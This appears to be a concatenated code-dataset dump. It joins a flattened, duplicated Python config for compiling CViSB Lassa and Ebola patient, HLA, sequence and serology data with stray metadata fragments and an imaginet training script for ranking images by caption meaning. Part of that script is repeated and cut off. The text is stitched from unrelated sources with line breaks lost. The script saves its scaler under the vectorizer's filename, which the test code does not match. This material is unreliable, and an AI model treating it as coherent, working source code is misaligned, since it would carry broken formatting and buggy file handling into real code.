# Config file to specify the inputs / outputs of CViSB data compilation from datetime import datetime today = datetime.today().strftime('%Y-%m-%d') DATADIR = "/Users/laurahughes/GitHub/cvisb_data/sample-viewer-api/src/static/data/" # [INPUTS] ---------------------------------------------------------------------------------------------- # --- id dictionary --- ID_DICT = f"{DATADIR}/output_data/patients/patients_2019-09-13_PRIVATE_dict.json" # --- patients --- # ACUTE_IDS_FILE = f"{DATADIR}/input_data/patient_rosters/additional_IDdict_v3_2019-10-23.csv" PATIENT_FILE = f"{DATADIR}/input_data/expt_summary_data/HLA/DisseminationData_31Aug20.xlsx" PATIENTS_UPDATEDBY = "<NAME>" PATIENTS_DATE = today PATIENTS_VERSION = 0.3 # --- hla --- HLA_FILE = f"{DATADIR}/input_data/expt_summary_data/HLA/Genotype_calls_2020-01-30.csv" HLA_DATE = "2020-11-23" HLA_VERSION = 0.3 HLA_UPDATEDBY = "<NAME>" # --- lassa virus seq --- ALIGNMENTS = [ {"virus": "Lassa", "segment": "S", "filename": "LASV_NP-GP_2020.11.23.fasta", "description": "Lassa virus NP-GP curated alignment", "curated": True, "url": "https://raw.githubusercontent.com/cvisb/curated-alignments/master/lassa/LASV_NP_GPC_2020.11.23.fasta"}, {"virus": "Lassa", "segment": "L", "filename": "LASV_L_Z_2020.11.23.fasta", "description": "Lassa virus L-Z curated alignment", "curated": True, "url": "https://raw.githubusercontent.com/cvisb/curated-alignments/master/lassa/LASV_L_Z_2020.11.23.fasta"}, {"virus": "Ebola", "segment": None, "filename": "EBOV_ORFs_2020.08.04.fasta", "curated": True, "description": "Ebola virus curated alignment", "url": "https://raw.githubusercontent.com/cvisb/curated-alignments/master/ebola/EBOV_ORFs_2020.08.04.fasta"} ] # LVIRAL_AAFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_curated_aln_2019.09.11_duplicates_public.translated.fasta" LVIRAL_SFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_NP_GPC_2020.11.23.fasta" LVIRAL_SFILE_UNCURATED = 
f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_NP_GPC_non_curated_2020.11.23.fasta" LVIRAL_LFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_L_Z_2020.11.23.fasta" LVIRAL_LFILE_UNCURATED = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_L_Z_non_curated_2020.11.23.fasta" LVIRAL_MDFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/dataset_lasv_curated_2020.11.23.csv" LVIRAL_DATE = "2020-11-23" LVIRAL_VERSION = 0.3 LVIRAL_UPDATEDBY = "<NAME>" # --- ebola virus seq --- EVIRAL_ALIGNEDFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/EBOV_ORFs_up_public_curated_2020.08.04.fasta" EVIRAL_FILE_UNCURATED = f"{DATADIR}/input_data/expt_summary_data/viral_seq/EBOV_ORFs_up_public_non_curated_2020.08.04.fasta" EVIRAL_MDFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/dataset_ebola_up_public_curated_2020.08.03.csv" EVIRAL_DATE = "2020-11-16" EVIRAL_VERSION = 0.3 EVIRAL_UPDATEDBY = "<NAME>" # --- serology --- SEROLOGY_FILE = f"{DATADIR}/input_data/expt_summary_data/systems_serology/CViSB_SystemsSerology_v0.2_2019Nov22_LH.xlsx" SEROLOGY_DATE = today SEROLOGY_VERSION = 0.2 SEROLOGY_UPDATEDBY = "<NAME>" # [OUPUTS] ---------------------------------------------------------------------------------------------- EXPORTDIR = f"{DATADIR}/output_data" LOGFILE = f"{DATADIR}/output_data/log/{today}_cvisb-compliation.log" EXPTCOLS = ['privatePatientID', 'experimentID', 'sampleID', 'visitCode', 'batchID', 'experimentDate', 'measurementTechnique', 'measurementCategory', 'variableMeasured', 'includedInDataset', 'isControl', 'publisher', 'citation', 'creator', 'data', 'correction', 'version', 'updatedBy', 'dateModified', 'releaseDate', 'sourceFiles', 'dataStatus'] # for non-KGH patients: what info should be PATIENTCOLS = [ "patientID", "species", "alternateIdentifier", "hasPatientData", "hasSurvivorData", "dateModified", "updatedBy", "dataStatus", 'sourceFiles', "version", "cohort", "outcome", "country", "countryName", "location", 
"locationPrivate", "infectionYear", 'publisher', 'citation','correction'] # For all experiments, to relate sample <--> experiment SAMPLECOLS = ["creatorInitials", "sampleLabel", "sampleType", "species", "sampleID", "samplingDate", 'sourceFiles'] # All data download properties, from experiments DOWNLOADCOLS = ["name", "includedInDataset", "identifier", "contentUrl", "additionalType", "variableMeasured", "measurementTechnique", "measurementCategory", "dateModified", "experimentIDs", "contentUrlRepository", "contentUrlIdentifier", "citation", "updatedBy", 'publisher', "creator"] # Properties to export in patient ID dictionary DICTCOLS = ["patientID", "gID", "sID", "publicGID", "publicSID", "cohort", "outcome", "alternateIdentifier", 'evalDate', 'dischargeDate', 'daysOnset', 'infectionDate', "age", "gender", "countryName", "elisa", "issue"] # DICTCOLS = ["patientID", "gID", "sID", "publicGID", "publicSID", "cohort", "outcome", "alternateIdentifier", # "issue"] # [GENERAL PARAMS] -------------------------------------------------------------------------------------- SAVEINIVIDUAL = False
# Config file to specify the inputs / outputs of CViSB data compilation from datetime import datetime today = datetime.today().strftime('%Y-%m-%d') DATADIR = "/Users/laurahughes/GitHub/cvisb_data/sample-viewer-api/src/static/data/" # [INPUTS] ---------------------------------------------------------------------------------------------- # --- id dictionary --- ID_DICT = f"{DATADIR}/output_data/patients/patients_2019-09-13_PRIVATE_dict.json" # --- patients --- # ACUTE_IDS_FILE = f"{DATADIR}/input_data/patient_rosters/additional_IDdict_v3_2019-10-23.csv" PATIENT_FILE = f"{DATADIR}/input_data/expt_summary_data/HLA/DisseminationData_31Aug20.xlsx" PATIENTS_UPDATEDBY = "<NAME>" PATIENTS_DATE = today PATIENTS_VERSION = 0.3 # --- hla --- HLA_FILE = f"{DATADIR}/input_data/expt_summary_data/HLA/Genotype_calls_2020-01-30.csv" HLA_DATE = "2020-11-23" HLA_VERSION = 0.3 HLA_UPDATEDBY = "<NAME>" # --- lassa virus seq --- ALIGNMENTS = [ {"virus": "Lassa", "segment": "S", "filename": "LASV_NP-GP_2020.11.23.fasta", "description": "Lassa virus NP-GP curated alignment", "curated": True, "url": "https://raw.githubusercontent.com/cvisb/curated-alignments/master/lassa/LASV_NP_GPC_2020.11.23.fasta"}, {"virus": "Lassa", "segment": "L", "filename": "LASV_L_Z_2020.11.23.fasta", "description": "Lassa virus L-Z curated alignment", "curated": True, "url": "https://raw.githubusercontent.com/cvisb/curated-alignments/master/lassa/LASV_L_Z_2020.11.23.fasta"}, {"virus": "Ebola", "segment": None, "filename": "EBOV_ORFs_2020.08.04.fasta", "curated": True, "description": "Ebola virus curated alignment", "url": "https://raw.githubusercontent.com/cvisb/curated-alignments/master/ebola/EBOV_ORFs_2020.08.04.fasta"} ] # LVIRAL_AAFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_curated_aln_2019.09.11_duplicates_public.translated.fasta" LVIRAL_SFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_NP_GPC_2020.11.23.fasta" LVIRAL_SFILE_UNCURATED = 
f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_NP_GPC_non_curated_2020.11.23.fasta" LVIRAL_LFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_L_Z_2020.11.23.fasta" LVIRAL_LFILE_UNCURATED = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_L_Z_non_curated_2020.11.23.fasta" LVIRAL_MDFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/dataset_lasv_curated_2020.11.23.csv" LVIRAL_DATE = "2020-11-23" LVIRAL_VERSION = 0.3 LVIRAL_UPDATEDBY = "<NAME>" # --- ebola virus seq --- EVIRAL_ALIGNEDFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/EBOV_ORFs_up_public_curated_2020.08.04.fasta" EVIRAL_FILE_UNCURATED = f"{DATADIR}/input_data/expt_summary_data/viral_seq/EBOV_ORFs_up_public_non_curated_2020.08.04.fasta" EVIRAL_MDFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/dataset_ebola_up_public_curated_2020.08.03.csv" EVIRAL_DATE = "2020-11-16" EVIRAL_VERSION = 0.3 EVIRAL_UPDATEDBY = "<NAME>" # --- serology --- SEROLOGY_FILE = f"{DATADIR}/input_data/expt_summary_data/systems_serology/CViSB_SystemsSerology_v0.2_2019Nov22_LH.xlsx" SEROLOGY_DATE = today SEROLOGY_VERSION = 0.2 SEROLOGY_UPDATEDBY = "<NAME>" # [OUPUTS] ---------------------------------------------------------------------------------------------- EXPORTDIR = f"{DATADIR}/output_data" LOGFILE = f"{DATADIR}/output_data/log/{today}_cvisb-compliation.log" EXPTCOLS = ['privatePatientID', 'experimentID', 'sampleID', 'visitCode', 'batchID', 'experimentDate', 'measurementTechnique', 'measurementCategory', 'variableMeasured', 'includedInDataset', 'isControl', 'publisher', 'citation', 'creator', 'data', 'correction', 'version', 'updatedBy', 'dateModified', 'releaseDate', 'sourceFiles', 'dataStatus'] # for non-KGH patients: what info should be PATIENTCOLS = [ "patientID", "species", "alternateIdentifier", "hasPatientData", "hasSurvivorData", "dateModified", "updatedBy", "dataStatus", 'sourceFiles', "version", "cohort", "outcome", "country", "countryName", "location", 
"locationPrivate", "infectionYear", 'publisher', 'citation','correction'] # For all experiments, to relate sample <--> experiment SAMPLECOLS = ["creatorInitials", "sampleLabel", "sampleType", "species", "sampleID", "samplingDate", 'sourceFiles'] # All data download properties, from experiments DOWNLOADCOLS = ["name", "includedInDataset", "identifier", "contentUrl", "additionalType", "variableMeasured", "measurementTechnique", "measurementCategory", "dateModified", "experimentIDs", "contentUrlRepository", "contentUrlIdentifier", "citation", "updatedBy", 'publisher', "creator"] # Properties to export in patient ID dictionary DICTCOLS = ["patientID", "gID", "sID", "publicGID", "publicSID", "cohort", "outcome", "alternateIdentifier", 'evalDate', 'dischargeDate', 'daysOnset', 'infectionDate', "age", "gender", "countryName", "elisa", "issue"] # DICTCOLS = ["patientID", "gID", "sID", "publicGID", "publicSID", "cohort", "outcome", "alternateIdentifier", # "issue"] # [GENERAL PARAMS] -------------------------------------------------------------------------------------- SAVEINIVIDUAL = False
en
0.484559
# Config file to specify the inputs / outputs of CViSB data compilation # [INPUTS] ---------------------------------------------------------------------------------------------- # --- id dictionary --- # --- patients --- # ACUTE_IDS_FILE = f"{DATADIR}/input_data/patient_rosters/additional_IDdict_v3_2019-10-23.csv" # --- hla --- # --- lassa virus seq --- # LVIRAL_AAFILE = f"{DATADIR}/input_data/expt_summary_data/viral_seq/LASV_curated_aln_2019.09.11_duplicates_public.translated.fasta" # --- ebola virus seq --- # --- serology --- # [OUPUTS] ---------------------------------------------------------------------------------------------- # for non-KGH patients: what info should be # For all experiments, to relate sample <--> experiment # All data download properties, from experiments # Properties to export in patient ID dictionary # DICTCOLS = ["patientID", "gID", "sID", "publicGID", "publicSID", "cohort", "outcome", "alternateIdentifier", # "issue"] # [GENERAL PARAMS] --------------------------------------------------------------------------------------
1.908799
2
main.py
gchrupala/imaginet
7
6623584
<filename>main.py #!/usr/bin/env python from __future__ import division import sys sys.path.append('/home/gchrupala/repos/Passage') sys.path.append('/home/gchrupala/repos/neuraltalk') from passage.layers import Embedding, SimpleRecurrent, LstmRecurrent, GatedRecurrent #, Dense from layers import * from passage.costs import MeanSquaredError from imaginet import * from passage.preprocessing import Tokenizer, tokenize import passage.utils import passage.updates from passage.iterators import SortedPadded import imagernn.data_provider as dp import cPickle from scipy.spatial.distance import cosine, cdist import numpy import os.path import argparse import random from sklearn.feature_extraction.text import CountVectorizer from sklearn.linear_model import Ridge from sklearn.preprocessing import StandardScaler import json import gzip def main(): parser = argparse.ArgumentParser( description='Learn to rank images according to similarity to \ caption meaning') parser.add_argument('--predict', dest='predict', action='store_true', help='Run in prediction mode') parser.add_argument('--paraphrase', dest='paraphrase', action='store_true', help='Run in paraphrasing mode') parser.add_argument('--paraphrase_state', dest='paraphrase_state', default='hidden_multi', help='Which state to use for paraphrase retrieval (hidden_multi, hidden_vis, hidden_text, output_vis)') parser.add_argument('--extract_embeddings', dest='extract_embeddings', action='store_true', help='Extract embeddings from trained model') parser.add_argument('--project_words', dest='project_words', action='store_true', help='Project words from vocabulary to visual space') parser.add_argument('--model', dest='model', default='model.dat.gz', help='Path to write model to') parser.add_argument('--model_type', dest='model_type', default='simple', help='Type of model: (linear, simple, shared_embeddings, shared_all)') parser.add_argument('--character', dest='character', action='store_true', help='Character-level model') 
parser.add_argument('--zero_shot', dest='zero_shot', action='store_true', help='Disable visual signal for sentences containing words in zero_shot.pkl.gz') parser.add_argument('--tokenizer', dest='tokenizer', default='tok.pkl.gz', help='Path to write tokenizer to') parser.add_argument('--init_model', dest='init_model', default=None, help='Initialize model weights with model from given path') parser.add_argument('--init_tokenizer', dest='init_tokenizer', default=None, help='Use tokenizer from given path') parser.add_argument('--iter_predict', type=int, help='Model after that many iterations will be used to predict') parser.add_argument('--scramble', action='store_true', help='Scramble words in a test sentence') parser.add_argument('--distance', default='cosine', help='Distance metric to rank images') parser.add_argument('--dataset', dest='dataset', default='flickr8k', help='Dataset: flick8k, flickr30k, coco') parser.add_argument('--hidden_size', dest='hidden_size', type=int, default=256, help='size of the hidden layer') parser.add_argument('--embedding_size', dest='embedding_size', type=int, default=None, help='size of (word) embeddings') parser.add_argument('--hidden_type', default='gru', help='recurrent layer type: gru, lstm') parser.add_argument('--activation', default='tanh', help='activation of the hidden layer units') parser.add_argument('--out_activation', default='linear', help='Activation of output units') parser.add_argument('--cost', default='MeanSquaredError', help='Image prediction cost function') parser.add_argument('--scaler', dest='scaler', default='none', help='Method to scale targets (none, standard)') parser.add_argument('--rate', dest='rate', type=float, default=0.0002, help='Learning rate') parser.add_argument('--clipnorm', dest='clipnorm', type=float, default=0.0, help='Gradients with norm larger than clipnorm will be scaled') parser.add_argument('--alpha', dest='alpha', type=float, default=0.0, help='Interpolation parameter for LM cost vs image 
cost') parser.add_argument('--ridge_alpha', dest='ridge_alpha', type=float, default=1.0, help='Regularization for linear regression model') parser.add_argument('--non_interpolated', dest='non_interpolated', action='store_true', help='Use non-interpolated cost') parser.add_argument('--iterations', dest='iterations', type=int, default=10, help='Number of training iterations') parser.add_argument('--word_freq_threshold', dest='word_freq_threshold', type=int, default=10, help='Map words below this threshold to UNK') parser.add_argument('--shuffle', dest='shuffle', action='store_true', help='Shuffle training data') parser.add_argument('--random_seed', dest='random_seed', default=None, type=int, help='Random seed') parser.add_argument('--snapshot_freq', dest='snapshot_freq', type=int, default=5, help='How many iterations to save model') parser.add_argument('--batch_size', dest='batch_size', type=int, default=64, help='Batch size') args = parser.parse_args() if args.random_seed is not None: numpy.random.seed(args.random_seed) if args.project_words: project_words(args) elif args.predict and args.model_type == 'linear': test_linear(args) elif args.predict and args.model_type != 'linear': test(args) elif args.extract_embeddings: extract_embeddings(args) elif args.model_type == 'linear': train_linear(args) else: train(args) def train_linear(args): p = dp.getDataProvider(args.dataset) data = list(p.iterImageSentencePair(split='train')) texts = [ pair['sentence']['raw'] for pair in data ] images = [ pair['image']['feat'] for pair in data ] analyzer = 'char' if args.character else 'word' vectorizer = CountVectorizer(min_df=args.word_freq_threshold, analyzer=analyzer, lowercase=True, ngram_range=(1,1)) X = vectorizer.fit_transform(texts) scaler = StandardScaler() if args.scaler == 'standard' else NoScaler() sys.stderr.write("BOW computed\n") Y = scaler.fit_transform(numpy.array(images)) model = Ridge(solver='lsqr', alpha=args.ridge_alpha) sys.stderr.write("Starting training\n") 
model.fit(X,Y) sys.stderr.write("Saving model\n") cPickle.dump(model, gzip.open('model.dat.gz','w')) cPickle.dump(vectorizer, gzip.open('vec.pkl.gz','w')) cPickle.dump(scaler, gzip.open('vec.pkl.gz', 'w')) def test_linear(args): if args.random_seed is not None: numpy.random.seed(args.random_seed) D = Cdist() model = cPickle.load(gzip.open('model.dat.gz')) vectorizer = cPickle.load(gzip.open('vec.pkl.gz')) scaler = cPickle.load(gzip.open('scaler.pkl.gz')) real_stdout = sys.stdout with open('/dev/null', 'w') as f: sys.stdout = f d = dp.getDataProvider(args.dataset) sys.stdout = real_stdout pairs = list(d.iterImageSentencePair(split='val')) texts = [ pair['sentence']['raw'] for pair in pairs ] images = list(d.iterImages(split='val')) # With pairs we'd get duplicate images! X = vectorizer.transform(texts) Y_pred = numpy.asarray(model.predict(X), dtype='float32') # candidates are identical to Y_pred if args.paraphrase: #distances = D.cosine_distance(Y_pred, Y_pred) distances = cdist(Y_pred, Y_pred, metric='cosine') N = 0 score = 0.0 for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] sentid = pairs[j]['sentence']['sentid'] best = numpy.argsort(row) top4 = sum([ imgid == pairs[b]['sentence']['imgid'] for b in best[0:5] if sentid != pairs[b]['sentence']['sentid'] ][0:4]) # exclude self score = score + top4/4.0 N = N+1 print args.iter_predict, N, score/N else: Y = numpy.array([ image['feat'] for image in images], dtype='float32') distances = D.cosine_distance(Y_pred, Y) errors = 0 N = 0 for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] best = numpy.argsort(row) top5 = [ images[b]['imgid'] for b in best[:5] ] N = N+1 if imgid not in top5: errors = errors + 1 print errors, N, errors/N def train(args): zero_words = cPickle.load(gzip.open("zero_shot.pkl.gz")) if args.zero_shot else set() def maybe_zero(s, i): overlap = set(tokenize(s)).intersection(zero_words) if args.zero_shot and len(overlap) > 0: return numpy.zeros(i.shape) else: 
return i dataset = args.dataset tok_path = args.tokenizer model_path = args.model d = dp.getDataProvider(dataset) pairs = list(d.iterImageSentencePair(split='train')) if args.shuffle: numpy.random.shuffle(pairs) output_size = len(pairs[0]['image']['feat']) embedding_size = args.embedding_size if args.embedding_size is not None else args.hidden_size tokenizer = cPickle.load(gzip.open(args.init_tokenizer)) \ if args.init_tokenizer else Tokenizer(min_df=args.word_freq_threshold, character=args.character) sentences, images = zip(*[ (pair['sentence']['raw'], maybe_zero(pair['sentence']['raw'],pair['image']['feat'])) for pair in pairs ]) scaler = StandardScaler() if args.scaler == 'standard' else NoScaler() images = scaler.fit_transform(images) tokens = [ [tokenizer.encoder['PAD']] + sent + [tokenizer.encoder['END'] ] for sent in tokenizer.fit_transform(sentences) ] tokens_inp = [ token[:-1] for token in tokens ] tokens_out = [ token[1:] for token in tokens ] cPickle.dump(tokenizer, gzip.open(tok_path, 'w')) cPickle.dump(scaler, gzip.open('scaler.pkl.gz','w')) # Validation data valid_pairs = list(d.iterImageSentencePair(split='val')) valid_sents, valid_images = zip(*[ (pair['sentence']['raw'], pair['image']['feat']) for pair in valid_pairs ]) valid_images = scaler.transform(valid_images) valid_tokens = [ [ tokenizer.encoder['PAD'] ] + sent + [tokenizer.encoder['END'] ] for sent in tokenizer.transform(valid_sents) ] valid_tokens_inp = [ token[:-1] for token in valid_tokens ] valid_tokens_out = [ token[1:] for token in valid_tokens ] valid = (valid_tokens_inp, valid_tokens_out, valid_images) updater = passage.updates.Adam(lr=args.rate, clipnorm=args.clipnorm) if args.cost == 'MeanSquaredError': z_cost = MeanSquaredError elif args.cost == 'CosineDistance': z_cost = CosineDistance else: raise ValueError("Unknown cost") if args.hidden_type == 'gru': Recurrent = GatedRecurrent elif args.hidden_type == 'lstm': Recurrent = LstmRecurrent else: Recurrent = GatedRecurrent # if 
args.init_model is not None: # model_init = cPickle.load(open(args.init_model)) # def values(ps): # return [ p.get_value() for p in ps ] # # FIXME enable this for shared only embeddings # layers = [ Embedding(size=args.hidden_size, n_features=tokenizer.n_features, # weights=values(model_init.layers[0].params)), # Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation, # weights=values(model_init.layers[1].params)), # Combined(left=Dense(size=tokenizer.n_features, activation='softmax', reshape=True, # weights=values(model_init.layers[2].left.params)), # right=Dense(size=output_size, activation=args.out_activation, # weights=values(model_init.layers[2].right.params)) # ) ] # else: # FIXME implement proper pretraining FIXME interpolated = True if not args.non_interpolated else False if args.model_type in ['add', 'mult', 'matrix']: if args.model_type == 'add': layer0 = Direct(size=embedding_size, n_features=tokenizer.n_features, op=Add) elif args.model_type == 'mult': layer0 = Direct(size=embedding_size, n_features=tokenizer.n_features, op=Mult) elif args.model_type == 'matrix': sqrt_size = embedding_size ** 0.5 if not sqrt_size.is_integer(): raise ValueError("Sqrt of embedding_size not integral for matrix model") layer0 = Direct(size=embedding_size, n_features=tokenizer.n_features, op=MatrixMult) layers = [ layer0, Dense(size=output_size, activation=args.out_activation, reshape=False) ] valid = (valid_tokens_inp, valid_images) model = RNN(layers=layers, updater=updater, cost=z_cost, iterator=SortedPadded(shuffle=False), verbose=1) model.fit(tokens_inp, images, n_epochs=args.iterations, batch_size=args.batch_size, len_filter=None, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) elif args.model_type == 'simple': layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Recurrent(seq_output=False, size=args.hidden_size, activation=args.activation), Dense(size=output_size, activation=args.out_activation, 
reshape=False) ] valid = (valid_tokens_inp, valid_images) model = RNN(layers=layers, updater=updater, cost=z_cost, iterator=SortedPadded(shuffle=False), verbose=1) model.fit(tokens_inp, images, n_epochs=args.iterations, batch_size=args.batch_size, len_filter=None, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) # FIXME need validation elif args.model_type == 'deep-simple': layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation), Recurrent(seq_output=False, size=args.hidden_size, activation=args.activation), Dense(size=output_size, activation=args.out_activation, reshape=False) ] valid = (valid_tokens_inp, valid_images) model = RNN(layers=layers, updater=updater, cost=z_cost, iterator=SortedPadded(shuffle=False), verbose=1) model.fit(tokens_inp, images, n_epochs=args.iterations, batch_size=args.batch_size, len_filter=None, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) # FIXME need validation elif args.model_type == 'shared_all': if args.zero_shot: raise NotImplementedError # FIXME zero_shot not implemented layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation), Combined(left=Dense(size=tokenizer.n_features, activation='softmax', reshape=True), right=Dense(size=output_size, activation=args.out_activation, reshape=False)) ] model = ForkedRNN(layers=layers, updater=updater, cost_y=CategoricalCrossEntropySwapped, cost_z=z_cost, alpha=args.alpha, size_y=tokenizer.n_features, verbose=1, interpolated=interpolated) model.fit(tokens_inp, tokens_out, images, n_epochs=args.iterations, batch_size=args.batch_size, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) elif args.model_type == 'shared_embeddings': layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Combined(left=Stacked([Recurrent(seq_output=True, 
size=args.hidden_size, activation=args.activation), Dense(size=tokenizer.n_features, activation='softmax', reshape=True)]), left_type='id', right=Stacked([Recurrent(seq_output=False, size=args.hidden_size, activation=args.activation), Dense(size=output_size, activation=args.out_activation, reshape=False)]), right_type='id') ] model = ForkedRNN(layers=layers, updater=updater, cost_y=CategoricalCrossEntropySwapped, cost_z=z_cost, alpha=args.alpha, size_y=tokenizer.n_features, verbose=1, interpolated=interpolated, zero_shot=args.zero_shot) model.fit(tokens_inp, tokens_out, images, n_epochs=args.iterations, batch_size=args.batch_size, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) cPickle.dump(model, gzip.open(model_path,"w")) def test(args): if args.random_seed is not None: numpy.random.seed(args.random_seed) def scramble(words): ixs = range(len(words)) random.shuffle(ixs) return [ words[ix] for ix in ixs ] testInfo = {'argv': sys.argv, 'dataset': args.dataset, 'scramble': args.scramble, 'model_type': args.model_type, 'alpha': args.alpha, 'iter_predict': args.iter_predict, 'task': 'paraphrase' if args.paraphrase else 'image', 'items': []} D = Cdist() dataset = args.dataset suffix = '' if args.iter_predict is None else ".{0}".format(args.iter_predict) model = cPickle.load(gzip.open('model.dat.gz' + suffix)) tokenizer = cPickle.load(gzip.open('tok.pkl.gz')) scaler = cPickle.load(gzip.open('scaler.pkl.gz')) real_stdout = sys.stdout with open('/dev/null', 'w') as f: sys.stdout = f d = dp.getDataProvider(args.dataset) sys.stdout = real_stdout pairs = list(d.iterImageSentencePair(split='val')) inputs = [ scramble(s) if args.scramble else s for s in tokenizer.transform([ pair['sentence']['raw'] for pair in pairs]) ] if args.paraphrase: candidates = tokenizer.transform([ pair['sentence']['raw'] for pair in pairs]) # No scrambling of candidates if args.paraphrase_state == 'output_vis': preds = model.predict(inputs) candidates_pred = model.predict(candidates) 
elif args.paraphrase_state == 'hidden_text': preds, _ = predict_h(model, inputs) candidates_pred, _ = predict_h(model, candidates) elif args.paraphrase_state == 'hidden_vis' and hasattr(model.layers[1], 'left'): _, preds = predict_h(model, inputs) _, candidates_pred = predict_h(model, candidates) elif args.paraphrase_state == 'hidden_vis' and not hasattr(model.layers[1], 'left'): preds = predict_h_simple(model, inputs) candidates_pred = predict_h_simple(model, candidates) elif args.paraphrase_state == 'hidden_multi': preds = numpy.hstack(predict_h(model, inputs)) candidates_pred = numpy.hstack(predict_h(model, candidates)) else: raise ValueError("Unknown state") distances = D.cosine_distance(preds, candidates_pred) #distances = cdist(preds, candidates_pred, metric='cosine') N = 0 score = 0.0 imgids = numpy.array([ pair['sentence']['imgid'] for pair in pairs ]) sentids = numpy.array([ pair['sentence']['sentid'] for pair in pairs]) for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] sentid = pairs[j]['sentence']['sentid'] best = numpy.argsort(row) rank = numpy.where((imgids[best] == imgid) * (sentids[best] != sentid))[0][0] + 1 top4 = [ pairs[b]['sentence']['imgid'] for b in best[0:5] if sentid != pairs[b]['sentence']['sentid'] ][0:4] # exclude self top4sent = [ pairs[b]['sentence']['sentid'] for b in best[0:5] if sentid != pairs[b]['sentence']['sentid'] ][0:4] score = score + sum([i == imgid for i in top4 ])/4.0 N = N+1 itemInfo = {'sentid':sentid, 'imgid': imgid, 'score': sum([i == imgid for i in top4 ])/4.0, 'rank': rank, 'topn': top4 , 'topnsentid': top4sent, 'input': tokenizer.inverse_transform([inputs[j]])[0]} testInfo['items'].append(itemInfo) print args.iter_predict, N, score/N else: preds = model.predict(inputs) images = list(d.iterImages(split='val')) distances = D.cosine_distance(preds, scaler.transform([image['feat'] for image in images ])) errors = 0 N = 0 imgids = numpy.array([ img['imgid'] for img in images ]) for j,row in 
enumerate(distances): imgid = pairs[j]['sentence']['imgid'] sentid = pairs[j]['sentence']['sentid'] best = numpy.argsort(row) rank = numpy.where(imgids[best] == imgid)[0][0] + 1 top5 = [ images[b]['imgid'] for b in best[:5] ] N = N+1 if imgid not in top5: errors = errors + 1 itemInfo = {'sentid':sentid, 'imgid': imgid, 'score': float(imgid in top5), 'rank': rank, 'topn': top5, 'input':tokenizer.inverse_transform([inputs[j]])[0] } testInfo['items'].append(itemInfo) print args.iter_predict, errors, N, errors/N testInfoPath = 'testInfo-task={0}-scramble={1}-iter_predict={2}.json.gz'.format(testInfo['task'], testInfo['scramble'], testInfo['iter_predict']) json.dump(testInfo, gzip.open(testInfoPath,'w')) def project_words(args): suffix = '' if args.iter_predict is None else ".{0}".format(args.iter_predict) model = cPickle.load(gzip.open('model.dat.gz' + suffix)) tokenizer = cPickle.load(gzip.open('tok.pkl.gz')) scaler = cPickle.load(gzip.open('scaler.pkl.gz')) exclude = ['PAD','END','UNK'] words, indexes = zip(*[ (w,i) for (w,i) in tokenizer.encoder.iteritems() if w not in exclude ]) inputs = [ [tokenizer.encoder['PAD'], i, tokenizer.encoder['END']] for i in indexes ] # FIXME actually for training we don't have END preds = scaler.inverse_transform(model.predict(inputs)) proj = dict((words[i], preds[i]) for i in range(0, len(words))) cPickle.dump(proj, gzip.open("proj.pkl.gz" + suffix, "w")) def extract_embeddings(args): tokenizer = cPickle.load(gzip.open('tok.pkl.gz')) #scaler = cPickle.load(open('scaler.pkl')) suffix = '' if args.iter_predict is None else ".{0}".format(args.iter_predict) model = cPickle.load(gzip.open('model.dat.gz' + suffix)) embeddings = model.layers[0].params[0].get_value() table = dict((word, embeddings[i]) for i,word in tokenizer.decoder.iteritems() if word not in ['END','PAD','UNK'] ) cPickle.dump(table, gzip.open('embeddings.pkl.gz' + suffix, 'w')) class Cdist(): def __init__(self): self.U = T.matrix('U') self.V = T.matrix('V') self.U_norm = 
self.U / self.U.norm(2, axis=1).reshape((self.U.shape[0], 1)) self.V_norm = self.V / self.V.norm(2, axis=1).reshape((self.V.shape[0], 1)) self.W = T.dot(self.U_norm, self.V_norm.T) self.cosine = theano.function([self.U, self.V], self.W) def cosine_distance(self, A, B): return 1 - self.cosine(A, B) main()
<filename>main.py #!/usr/bin/env python from __future__ import division import sys sys.path.append('/home/gchrupala/repos/Passage') sys.path.append('/home/gchrupala/repos/neuraltalk') from passage.layers import Embedding, SimpleRecurrent, LstmRecurrent, GatedRecurrent #, Dense from layers import * from passage.costs import MeanSquaredError from imaginet import * from passage.preprocessing import Tokenizer, tokenize import passage.utils import passage.updates from passage.iterators import SortedPadded import imagernn.data_provider as dp import cPickle from scipy.spatial.distance import cosine, cdist import numpy import os.path import argparse import random from sklearn.feature_extraction.text import CountVectorizer from sklearn.linear_model import Ridge from sklearn.preprocessing import StandardScaler import json import gzip def main(): parser = argparse.ArgumentParser( description='Learn to rank images according to similarity to \ caption meaning') parser.add_argument('--predict', dest='predict', action='store_true', help='Run in prediction mode') parser.add_argument('--paraphrase', dest='paraphrase', action='store_true', help='Run in paraphrasing mode') parser.add_argument('--paraphrase_state', dest='paraphrase_state', default='hidden_multi', help='Which state to use for paraphrase retrieval (hidden_multi, hidden_vis, hidden_text, output_vis)') 